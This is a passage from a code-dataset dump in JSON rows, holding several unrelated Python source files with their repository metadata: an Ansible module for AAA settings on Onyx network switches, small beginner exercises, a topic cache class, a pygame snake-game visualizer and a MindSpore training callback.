show_cmd\nfrom ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import BaseOnyxModule\n\n\nclass OnyxAAAModule(BaseOnyxModule):\n\n def init_module(self):\n \"\"\" initialize module\n \"\"\"\n element_spec = dict(\n tacacs_accounting_enabled=dict(type='bool'),\n auth_default_user=dict(type='str', choices=['admin', 'monitor']),\n auth_order=dict(type='str', choices=['local-only', 'remote-first', 'remote-only']),\n auth_fallback_enabled=dict(type='bool')\n )\n argument_spec = dict()\n argument_spec.update(element_spec)\n self._module = AnsibleModule(\n argument_spec=argument_spec,\n supports_check_mode=True)\n\n def get_required_config(self):\n module_params = self._module.params\n self._required_config = 
dict(module_params)\n self.validate_param_values(self._required_config)\n\n def _set_aaa_config(self, all_aaa_config):\n aaa_config = all_aaa_config[0]\n self._current_config['auth_default_user'] = aaa_config.get(\"Default User\")\n self._current_config['auth_order'] = aaa_config.get(\"Map Order\")\n auth_fallback_enabled = aaa_config.get(\"Fallback on server-err\")\n if auth_fallback_enabled == \"yes\":\n self._current_config['auth_fallback_enabled'] = True\n else:\n self._current_config['auth_fallback_enabled'] = False\n aaa_config_2 = all_aaa_config[2]\n accounting_message = aaa_config_2.get(\"message\")\n if accounting_message == \"No accounting methods configured.\":\n self._current_config['tacacs_accounting_enabled'] = False\n else:\n self._current_config['tacacs_accounting_enabled'] = True\n\n def _show_aaa_config(self):\n cmd = \"show aaa\"\n return show_cmd(self._module, cmd, json_fmt=True, fail_on_error=False)\n\n def load_current_config(self):\n self._current_config = dict()\n aaa_config = self._show_aaa_config()\n if aaa_config:\n self._set_aaa_config(aaa_config)\n\n def generate_commands(self):\n tacacs_accounting_enabled = self._required_config.get(\"tacacs_accounting_enabled\")\n if tacacs_accounting_enabled is not None:\n current_accounting_enabled = self._current_config.get(\"tacacs_accounting_enabled\")\n if current_accounting_enabled != tacacs_accounting_enabled:\n if tacacs_accounting_enabled is True:\n self._commands.append('aaa accounting changes default stop-only tacacs+')\n else:\n self._commands.append('no aaa accounting changes default stop-only tacacs+')\n\n auth_default_user = self._required_config.get(\"auth_default_user\")\n if auth_default_user is not None:\n current_user = self._current_config.get(\"auth_default_user\")\n if current_user != auth_default_user:\n self._commands.append('aaa authorization map default-user {0}' .format(auth_default_user))\n\n auth_order = self._required_config.get(\"auth_order\")\n if auth_order is not 
None:\n current_order = self._current_config.get(\"auth_order\")\n if current_order != auth_order:\n self._commands.append('aaa authorization map order {0}' .format(auth_order))\n\n auth_fallback_enabled = self._required_config.get(\"auth_fallback_enabled\")\n if auth_fallback_enabled is not None:\n current_fallback = self._current_config.get(\"auth_fallback_enabled\")\n if current_fallback != auth_fallback_enabled:\n if auth_fallback_enabled is True:\n self._commands.append('aaa authorization map fallback server-err')\n else:\n self._commands.append('no aaa authorization map fallback server-err')\n\n\ndef main():\n \"\"\" main entry point for module execution\n \"\"\"\n OnyxAAAModule.main()\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":36.6770186335,"string":"36.677019"},"max_line_length":{"kind":"number","value":106,"string":"106"},"alphanum_fraction":{"kind":"number","value":0.682641829,"string":"0.682642"}}},{"rowIdx":46370,"cells":{"hexsha":{"kind":"string","value":"e804af1034061f2f104d2ffe58eec14a7bc29868"},"size":{"kind":"number","value":88,"string":"88"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 26/26.py"},"max_stars_repo_name":{"kind":"string","value":"jaswinder9051998/Resources"},"max_stars_repo_head_hexsha":{"kind":"string","value":"fd468af37bf24ca57555d153ee64693c018e822e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":101,"string":"101"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-20T11:57:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-23T09:49:13.000Z"},"max_issues_repo_path":{"kind":"string","value":"50-Python-Exercises/Exercises/Exercise 
26/26.py"},"max_issues_repo_name":{"kind":"string","value":"kuwarkapur/Hacktoberfest-2022"},"max_issues_repo_head_hexsha":{"kind":"string","value":"efaafeba5ce51d8d2e2d94c6326cc20bff946f17"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-01-12T11:55:56.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-12T04:53:33.000Z"},"max_forks_repo_path":{"kind":"string","value":"50-Python-Exercises/Exercises/Exercise 26/26.py"},"max_forks_repo_name":{"kind":"string","value":"kuwarkapur/Hacktoberfest-2022"},"max_forks_repo_head_hexsha":{"kind":"string","value":"efaafeba5ce51d8d2e2d94c6326cc20bff946f17"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":38,"string":"38"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-01-12T11:56:16.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-23T10:07:52.000Z"},"content":{"kind":"string","value":"#Make a script that prints out numbers from 1 to 10\n\nfor i in range(1,11):\n 
print(i)\n"},"avg_line_length":{"kind":"number","value":17.6,"string":"17.6"},"max_line_length":{"kind":"number","value":51,"string":"51"},"alphanum_fraction":{"kind":"number","value":0.6818181818,"string":"0.681818"}}},{"rowIdx":46371,"cells":{"hexsha":{"kind":"string","value":"e826dce0a2efec3777ab49d67c529dd9c42675ca"},"size":{"kind":"number","value":2811,"string":"2,811"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_stars_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_issues_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_forks_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from typing import List, Optional\n\nfrom watchmen_data_kernel.storage import TopicDataEntityHelper\nfrom watchmen_data_kernel.topic_schema import TopicSchema\nfrom watchmen_model.admin import Topic\nfrom watchmen_model.common import TenantId, TopicId\nfrom .cache_manager import get_topic_by_id_cache, get_topic_by_tenant_and_name_cache, \\\n\tget_topic_entity_helper_by_id_cache, get_topic_schema_by_id_cache\nfrom .internal_cache import InternalCache\nfrom .pipeline_by_topic_cache import pipeline_by_topic_cache\n\n\nclass TopicCache:\n\tdef __init__(self):\n\t\tself.byIdCache = InternalCache(cache=get_topic_by_id_cache)\n\t\tself.byTenantAndNameCache = InternalCache(cache=get_topic_by_tenant_and_name_cache)\n\t\tself.schemaByIdCache = InternalCache(cache=get_topic_schema_by_id_cache)\n\t\tself.entityHelperByIdCache = InternalCache(cache=get_topic_entity_helper_by_id_cache)\n\n\t# noinspection PyMethodMayBeStatic\n\tdef to_tenant_and_name_key(self, name: str, tenant_id: TenantId) -> str:\n\t\treturn f'{tenant_id}-{name}'\n\n\tdef put(self, topic: Topic) -> Optional[Topic]:\n\t\t# topic is changed, remove from entity helper cache anyway\n\t\tself.entityHelperByIdCache.remove(topic.topicId)\n\t\t# refresh other caches\n\t\texisting_topic = self.byIdCache.put(topic.topicId, topic)\n\t\tself.byTenantAndNameCache.put(\n\t\t\tself.to_tenant_and_name_key(topic.name, topic.tenantId), topic)\n\t\tself.schemaByIdCache.put(topic.topicId, TopicSchema(topic))\n\t\treturn existing_topic\n\n\tdef put_entity_helper(self, entity_helper: TopicDataEntityHelper) -> Optional[TopicDataEntityHelper]:\n\t\treturn self.entityHelperByIdCache.put(entity_helper.get_topic().topicId, entity_helper)\n\n\tdef get(self, topic_id: TopicId) -> Optional[Topic]:\n\t\treturn 
self.byIdCache.get(topic_id)\n\n\tdef get_schema(self, topic_id: TopicId) -> Optional[TopicSchema]:\n\t\treturn self.schemaByIdCache.get(topic_id)\n\n\tdef get_entity_helper(self, topic_id: TopicId) -> Optional[TopicDataEntityHelper]:\n\t\treturn self.entityHelperByIdCache.get(topic_id)\n\n\tdef get_by_name(self, name: str, tenant_id: TenantId) -> Optional[Topic]:\n\t\treturn self.byTenantAndNameCache.get(self.to_tenant_and_name_key(name, tenant_id))\n\n\tdef remove(self, topic_id: TopicId) -> Optional[Topic]:\n\t\texisting: Optional[Topic] = self.byIdCache.remove(topic_id)\n\t\tif existing is not None:\n\t\t\tpipeline_by_topic_cache.remove(topic_id)\n\t\t\tself.byTenantAndNameCache.remove(self.to_tenant_and_name_key(existing.name, existing.tenantId))\n\t\tself.schemaByIdCache.remove(topic_id)\n\t\tself.entityHelperByIdCache.remove(topic_id)\n\t\treturn existing\n\n\tdef all(self) -> List[Topic]:\n\t\treturn list(self.byIdCache.values())\n\n\tdef clear(self) -> None:\n\t\tself.byIdCache.clear()\n\t\tself.byTenantAndNameCache.clear()\n\t\tself.schemaByIdCache.clear()\n\t\tself.entityHelperByIdCache.clear()\n\t\tpipeline_by_topic_cache.clear()\n\n\ntopic_cache = TopicCache()\n"},"avg_line_length":{"kind":"number","value":40.1571428571,"string":"40.157143"},"max_line_length":{"kind":"number","value":102,"string":"102"},"alphanum_fraction":{"kind":"number","value":0.8118107435,"string":"0.811811"}}},{"rowIdx":46372,"cells":{"hexsha":{"kind":"string","value":"c7742d037fbfa87807fd9419663afe8f98d4b927"},"size":{"kind":"number","value":1087,"string":"1,087"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Beginner/03. 
Python/remove_duplicates.py"},"max_stars_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_stars_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-03-16T16:44:04.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-06-07T17:32:51.000Z"},"max_issues_repo_path":{"kind":"string","value":"Beginner/03. Python/remove_duplicates.py"},"max_issues_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_issues_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Beginner/03. 
Python/remove_duplicates.py"},"max_forks_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_forks_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-10-26T08:44:01.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-10-26T08:44:01.000Z"},"content":{"kind":"string","value":"'''\nGiven an input of a 2D array of integers, removes all duplicates from the array.\nEmpty sub-arrays are removed.\n'''\nmap = {}\n\ndef remove_duplicates(all_nums):\n end_index = len(all_nums) #length of all_nums\n i = 0 #current index of all_nums\n while(i < end_index):\n j = 0 #current index of sub-array\n sub_arr = all_nums[i]\n sub_end = len(sub_arr)\n while(j < sub_end):\n if(map.get(sub_arr[j]) != None):\n sub_end = sub_end - 1 #decrease length of sub_arr due removal\n sub_arr.remove(sub_arr[j])\n if(len(all_nums[i]) == 0):\n end_index = end_index - 1 #decrease length of all_nums due to empty array removal\n all_nums.remove(all_nums[i])\n i = i - 1\n continue\n else:\n print(\"No\",sub_arr[j],\"found in map.\")\n map[sub_arr[j]] = 1\n j = j + 1\n i = i + 1\n\n print(all_nums)\n\narr = [[1, 2], [2, 2, 2, 2, 2], [2, 3], [4, 5, 2, 2, 2], [3, 3, 3, 
4]]\n\nremove_duplicates(arr)\n"},"avg_line_length":{"kind":"number","value":31.9705882353,"string":"31.970588"},"max_line_length":{"kind":"number","value":101,"string":"101"},"alphanum_fraction":{"kind":"number","value":0.5225390984,"string":"0.522539"}}},{"rowIdx":46373,"cells":{"hexsha":{"kind":"string","value":"1bfcbe98a563233e76cce2f48c46d13e30ac670b"},"size":{"kind":"number","value":5222,"string":"5,222"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_stars_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_stars_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-03-30T09:25:53.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2020-03-30T09:25:53.000Z"},"max_issues_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_issues_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_issues_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-02-05T14:00:23.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2020-03-30T19:57:19.000Z"},"max_forks_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_forks_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_forks_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_forks_repo_licenses":{"kind":"list 
like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import pygame\n\nfrom GameData import GameData\nfrom TrainingData import TrainingData\nfrom Field import Field\n\n\nclass Visualization:\n def __init__(self, pixel_size: int, field: Field):\n self.current_print_y: int = 0\n\n # PyGame stuff\n pygame.init()\n pygame.fastevent.init()\n self.clock = pygame.time.Clock()\n\n # Arbitrary decisions\n self._pixel_width: int = pixel_size\n self._pixel_height: int = pixel_size\n\n # Prepare something to show\n self.field: Field = field\n self.window = pygame.display.set_mode((field.width * pixel_size + 380, field.height * pixel_size + 40))\n pygame.display.set_caption('AI Snake @mitutoyoctlg')\n self.font_style = pygame.font.SysFont(\"Arial\", 16)\n self.field_position: tuple = (315, 15)\n self.text_color: list = [255, 255, 255]\n\n # Cache\n self.last_field = None\n\n def tick(self) -> None:\n self.clock.tick(0)\n pygame.display.flip()\n\n def reset(self):\n self.current_print_y = 5\n\n def _draw_field(self, field: Field, offset=0):\n if self.last_field is None:\n self.last_field = Field(field.width, field.height)\n self.last_field.set_all_pixels_to([-1, -1, -1]) # ensures a repaint\n pygame.draw.rect(self.window, [50, 50, 50],\n pygame.Rect(self.field_position[0], self.field_position[1],\n field.width * self._pixel_width, field.height * self._pixel_height))\n\n sizechange = 1 if offset > 0 else 0\n for y in range(0, field.height):\n for x in range(0, field.width):\n pixel_color = field.field[y][x]\n if offset == 0:\n if pixel_color == self.last_field.field[y][x]:\n continue\n left = (x - offset) * self._pixel_width + self.field_position[0] + 1 + sizechange * 5\n top = (y - offset) * self._pixel_height + self.field_position[1] + 1 + sizechange * 5\n width = self._pixel_width - 2 - sizechange * 
10\n height = self._pixel_height - 2 - sizechange * 10\n pygame.draw.rect(self.window, pixel_color, pygame.Rect(left, top, width, height))\n\n # remember the pixel if original field\n if offset == 0:\n self.last_field.field[y][x] = pixel_color\n\n def display_visualization_stats(self):\n self.text_color = [0, 255, 0]\n fps = int(self.clock.get_fps())\n self._print_in_window(f\"{fps} fps\")\n self._print_in_window(\"\")\n\n def display_training(self, training: TrainingData):\n if training is None:\n return\n self.text_color = [0, 255, 255]\n self._print_in_window(f\"Epoch: {training.epoch} / {training.max_epochs}\")\n self._print_in_window(f\"Steps walked: {training.number_of_steps_walked} / {training.max_number_of_steps}\")\n self._print_in_window(f\"Best score (snake length): {training.best_score}\")\n self._print_in_window(f\"Best steps walked: {training.best_steps_walked}\")\n self._print_in_window(f\"Total training steps (all epochs): {training.total_steps_walked}\")\n self._print_in_window(f\"Total food eaten (all epochs): {training.total_food_eaten}\")\n self._print_in_window(f\"Average food eaten (all epochs): {round((training.total_food_eaten / training.epoch) * 1000) / 1000}\")\n self._print_in_window(f\"ε : {int(training.epsilon * 100)}%\")\n self._print_in_window(\"\")\n\n def display_game(self, info: GameData):\n self.text_color = [128, 128, 255]\n self._print_in_window(f\"Snake direction: {info.direction}\")\n self._print_in_window(f\"Snake head: {info.head_x} , {info.head_y}\")\n self._print_in_window(f\"Snake length (score): {info.snake_length}\")\n self._print_in_window(f\"\")\n self._print_in_window(f\"Food position: {info.food_x} , {info.food_y}\")\n self._print_in_window(f\"Food direction: {info.food_direction}\")\n self._print_in_window(f\"Distance to food in steps: {info.food_distance_in_steps}\")\n self._print_in_window(f\"Air-line distance to food: {info.air_line_distance}\")\n self._print_in_window(f\"\")\n self._print_in_window(f\"Wall 
distances:\")\n self._print_in_window(f\" {info.walldistance_n}\")\n self._print_in_window(f\"{info.walldistance_w} {info.walldistance_e}\")\n self._print_in_window(f\" {info.walldistance_s}\")\n self._print_in_window(f\"Distance to closest wall: {info.nearest_wall_distance}\")\n self._print_in_window(f\"Distance to wall in walking direction: {info.distance_to_wall_in_current_direction}\")\n self._print_in_window(\"\")\n self._draw_field(info.field)\n\n def _print_in_window(self, text: str) -> None:\n line_distance = 16\n self.current_print_y += line_distance\n pixels = self.font_style.render(text + \" \", True, self.text_color, [0, 0, 0])\n self.window.blit(pixels, [5, self.current_print_y])\n\n def add_layer(self, visualization_field):\n if visualization_field is not None:\n self._draw_field(visualization_field, 1)\n"},"avg_line_length":{"kind":"number","value":46.2123893805,"string":"46.212389"},"max_line_length":{"kind":"number","value":134,"string":"134"},"alphanum_fraction":{"kind":"number","value":0.6346227499,"string":"0.634623"}}},{"rowIdx":46374,"cells":{"hexsha":{"kind":"string","value":"d3c0698c06fb8aa6e7f973e111326d1789b2d201"},"size":{"kind":"number","value":308,"string":"308"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_stars_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_issues_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_forks_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"content":{"kind":"string","value":"# This is to find the sum of digits of a number until it is a single digit\n\ndef sum_of_digits(n):\n n = int(input()) # here n is the number\n if n % 9 != 0:\n print(n % 9)\n else:\n print(\"9\")\n \n# This method reduces time complexity by a factor of n and also without using any 
loop\n\n"},"avg_line_length":{"kind":"number","value":25.6666666667,"string":"25.666667"},"max_line_length":{"kind":"number","value":86,"string":"86"},"alphanum_fraction":{"kind":"number","value":0.6136363636,"string":"0.613636"}}},{"rowIdx":46375,"cells":{"hexsha":{"kind":"string","value":"d3c1e06d5da6a9eccf9d261778767e37808ed7c6"},"size":{"kind":"number","value":4474,"string":"4,474"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list 
like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"callbacks\"\"\"\n\nimport time\nimport numpy as np\nfrom mindspore.train.callback import Callback\nfrom mindspore.common.tensor import Tensor\n\nclass StateMonitor(Callback):\n \"\"\"StateMonitor\"\"\"\n def __init__(self, data_size, tot_batch_size=None, lrs=None,\n eval_interval=None, eval_offset=None, eval_engine=None, logger=None):\n super(StateMonitor, self).__init__()\n self.data_size = data_size\n self.tot_batch_size = tot_batch_size\n self.lrs = lrs\n self.epoch_num = 0\n self.loss = 0\n self.eval_interval = eval_interval\n self.eval_offset = eval_offset\n self.eval_engine = eval_engine\n self.best_acc = -1\n self.best_acc_top5 = -1\n self.best_i2t_recall = -1\n self.best_t2i_recall = -1\n self.mean_fps = 0.0\n self.print = print\n if logger is not None:\n self.print = logger\n\n\n def step_end(self, run_context):\n cb_params = run_context.original_args()\n loss = cb_params.net_outputs\n\n if isinstance(loss, (tuple, list)):\n if 
isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):\n loss = loss[0]\n\n if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):\n loss = np.mean(loss.asnumpy())\n\n self.loss = loss\n\n def epoch_begin(self, run_context):\n self.epoch_time = time.time()\n\n def epoch_end(self, run_context):\n epoch_seconds = (time.time() - self.epoch_time)\n per_step_seconds = epoch_seconds / self.data_size\n\n print_str = \"epoch[{}]\".format(self.epoch_num)\n print_str += ', epoch time: {:.2f}s'.format(epoch_seconds)\n print_str += ', per step time: {:.4f}s'.format(per_step_seconds)\n print_str += ', loss={:.6f}'.format(self.loss)\n\n if self.lrs is not None:\n lr = self.lrs[(self.epoch_num + 1) * self.data_size - 1]\n print_str += ', lr={:.6f}'.format(lr)\n\n if self.tot_batch_size is not None:\n fps = self.tot_batch_size * self.data_size / epoch_seconds\n self.mean_fps = (self.mean_fps * self.epoch_num + fps) / (self.epoch_num + 1)\n print_str += ', fps={:.2f}'.format(fps)\n\n if (self.epoch_num + 1) % self.eval_interval == self.eval_offset:\n eval_start = time.time()\n self.eval_engine.eval()\n output = self.eval_engine.get_result()\n eval_seconds = time.time() - eval_start\n if output is not None:\n if isinstance(output, list):\n print_str += ', top1 accuracy={:.6f}'.format(float(output[0]))\n print_str += ', top5 accuracy={:.6f}'.format(float(output[1]))\n print_str += ', i2t_recall={:.6f}'.format(float(output[2]))\n print_str += ', t2i_recall={:.6f}'.format(float(output[3]))\n print_str += ', eval_cost={:.2f}'.format(eval_seconds)\n\n if float(output[0]) > self.best_acc:\n self.best_acc = float(output[0])\n if float(output[1]) > self.best_acc_top5:\n self.best_acc_top5 = float(output[1])\n if float(output[2]) > self.best_i2t_recall:\n self.best_i2t_recall = float(output[2])\n if float(output[3]) > self.best_t2i_recall:\n self.best_t2i_recall = float(output[3])\n else:\n print_str += ', accuracy={:.6f}'.format(float(output))\n 
print_str += ', eval_cost={:.2f}'.format(eval_seconds)\n\n if float(output) > self.best_acc:\n self.best_acc = float(output)\n\n self.print(print_str)\n self.epoch_num += 1\n"},"avg_line_length":{"kind":"number","value":41.0458715596,"string":"41.045872"},"max_line_length":{"kind":"number","value":89,"string":"89"},"alphanum_fraction":{"kind":"number","value":0.5827000447,"string":"0.5827"}}},{"rowIdx":46376,"cells":{"hexsha":{"kind":"string","value":"d3d107629e018d079de059c29b5b2649cece9a04"},"size":{"kind":"number","value":21159,"string":"21,159"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_stars_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_stars_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-11-13T02:35:56.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-03-29T20:15:54.000Z"},"max_issues_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_issues_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_issues_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
